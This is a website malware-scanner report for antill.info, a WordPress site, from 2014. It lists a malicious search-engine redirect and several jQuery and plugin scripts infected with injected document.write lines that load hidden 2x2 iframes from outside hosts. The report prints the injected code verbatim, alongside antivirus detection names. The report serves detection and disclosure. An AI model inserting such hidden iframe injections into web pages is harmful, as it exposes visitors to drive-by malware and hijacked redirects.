New scan:

Malware Scanner report for antill.info

Malicious/Suspicious/Total urls checked
5/0/13
5 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://habboigratis.altervista.org/ohin.html?h=768843
169 websites infected.

The website "antill.info" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/15/15
15 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://antill.info/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: antill.info
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 04 Sep 2014 19:31:18 GMT
Location: http://habboigratis.altervista.org/ohin.html?h=768843
Server: Apache
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://antill.info/
200 OK
Content-Length: 59345
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://prospinalinc.com/ehin.html?i=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?i=768843>

http://antill.info/wp-includes/js/jquery/jquery.js?ver=1.7.2
200 OK
Content-Length: 95215
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>');

(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}func
... 3225 bytes are skipped ...
if(s===2){if(!o){o={};while(c=bG.exec(n))o[c[1].toLowerCase()]=c[2]}c=o[a.toLowerCase()]}return c===b?null:c},overrideMimeType:function(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bF,"").replace(bK,bV[1]+"jQuery.noConflict();

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AMP [Trj]
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.Iframe.BZW
Emsisoft
Trojan.Iframe.BZW (B)
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
Fortinet
JS/Iframe.HH!tr
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
F-Secure
Trojan.Iframe.BZW
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
Commtouch
IFrame.gen
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

Hidden iFrame found.
size: 2x2     
src: http://habboigratis.altervista.org/ohin.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843>

Hidden iFrame found.
size: 2x2     
src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843>

http://antill.info/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6
200 OK
Content-Length: 10036
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>');


;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.
... 3118 bytes are skipped ...
gLeft|borderLeftWidth|scrollLeft|scrollTop|setInterval|66|fancy_bg_n|fancy_bg_ne|fancy_bg_e|fancy_bg_se|fancy_bg_s|fancy_bg_sw|fancy_bg_w|fancy_bg_nw|body|cellspacing|cellpadding|border|fancy_title_left|fancy_title_main|fancy_title_right|prepend|scrolling|contentWindow|open|300|560|340|666|ready|boxModel'.split('|'),0,{}));
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>');

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
HTML:Iframe-BNK [Trj]
Ad-Aware
Trojan.Iframe.CEG
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.Iframe.CEG
Emsisoft
Trojan.Iframe.CEG (B)
Comodo
TrojWare.HTML.iFrame.TWTR
McAfee-GW-Edition
JS/IFrame.gen.j
Microsoft
Exploit:HTML/IframeRef.DM
Kaspersky
Trojan.HTML.IFrame.gh
MicroWorld-eScan
Trojan.Iframe.CEG
Fortinet
JS/Iframe.HH!tr
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.CEG
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.YR
GData
Trojan.Iframe.CEG
Symantec
Trojan.Maliframe!html
Commtouch
IFrame.gen
BitDefender
Trojan.Iframe.CEG

Hidden iFrame found.
size: 2x2     
src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843>

Hidden iFrame found.
size: 2x2     
src: http://offtherunwayhairstudio.com/ahsu.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html>

Hidden iFrame found.
size: 2x2     
src: http://habboigratis.altervista.org/ohin.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843>

http://antill.info/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3
200 OK
Content-Length: 8611
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>');

jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend( jQuery.easing,
{
def: 'ease
... 3500 bytes are skipped ...
b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843>

Hidden iFrame found.
size: 2x2     
src: http://habboigratis.altervista.org/ohin.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843>

Hidden iFrame found.
size: 2x2     
src: http://offtherunwayhairstudio.com/ahsu.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html>

http://maps.google.com/maps/api/js?sensor=true&ver=3
200 OK
Content-Length: 5042
Content-Type: text/javascript
clean
http://antill.info/wp-content/plugins/pronamic-google-maps/js/site.js?ver=3.4.1
200 OK
Content-Length: 3372
Content-Type: application/x-javascript
clean
http://antill.info/wp-content/plugins/sm-booking-form/js/jquery-1.3.2.min.js
200 OK
Content-Length: 57276
Content-Type: application/x-javascript
clean
http://antill.info/wp-content/plugins/sm-booking-form/js/jquery-ui-1.8.1.custom.min.js
200 OK
Content-Length: 200846
Content-Type: application/x-javascript
clean
http://antill.info/wp-content/plugins/sm-booking-form/js/sm-script.js
200 OK
Content-Length: 14048
Content-Type: application/x-javascript
clean
http://antill.info/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52
200 OK
Content-Length: 23086
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?j=768843></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>');

;(function($) {
$.fn.ajaxSubmit = function(options) {
if (!this.length) {
log('ajaxSubmit: skipping submit proces
... 3615 bytes are skipped ...
mit.debug) {
var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,'');
if (window.console && window.console.log) {
window.console.log(msg);
}
else if (window.opera && window.opera.postError) {
window.opera.postError(msg);
}
}
};
})(jQuery);
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://prospinalinc.com/ehin.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?j=768843>

Hidden iFrame found.
size: 2x2     
src: http://habboigratis.altervista.org/ohin.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843>

Hidden iFrame found.
size: 2x2     
src: http://offtherunwayhairstudio.com/ahsu.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html>

http://antill.info/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.4
200 OK
Content-Length: 6316
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>');

(function($) {

$(function() {
try {
if (typeof _wpcf7 == 'undefined' || _wpcf7
... 3542 bytes are skipped ...
(this).find('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked');
$(this).find('span.wpcf7-not-valid-tip').remove();
$(this).find('img.ajax-loader').css({ visibility: 'hidden' });
});
};

})(jQuery);
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://habboigratis.altervista.org/ohin.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843>

Hidden iFrame found.
size: 2x2     
src: http://offtherunwayhairstudio.com/ahsu.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html>

Hidden iFrame found.
size: 2x2     
src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843>

http://pskovdachnik.in/scripts/swf.js
500 Can't connect to pskovdachnik.in:80 (Bad hostname)
Content-Length: 162
Content-Type: text/plain
clean
http://pskovdachnik.in/test404page.js
500 Can't connect to pskovdachnik.in:80 (Bad hostname)
Content-Length: 162
Content-Type: text/plain
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=antill.info

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://antill.info/

Result: antill.info is not infected or malware details are not published yet.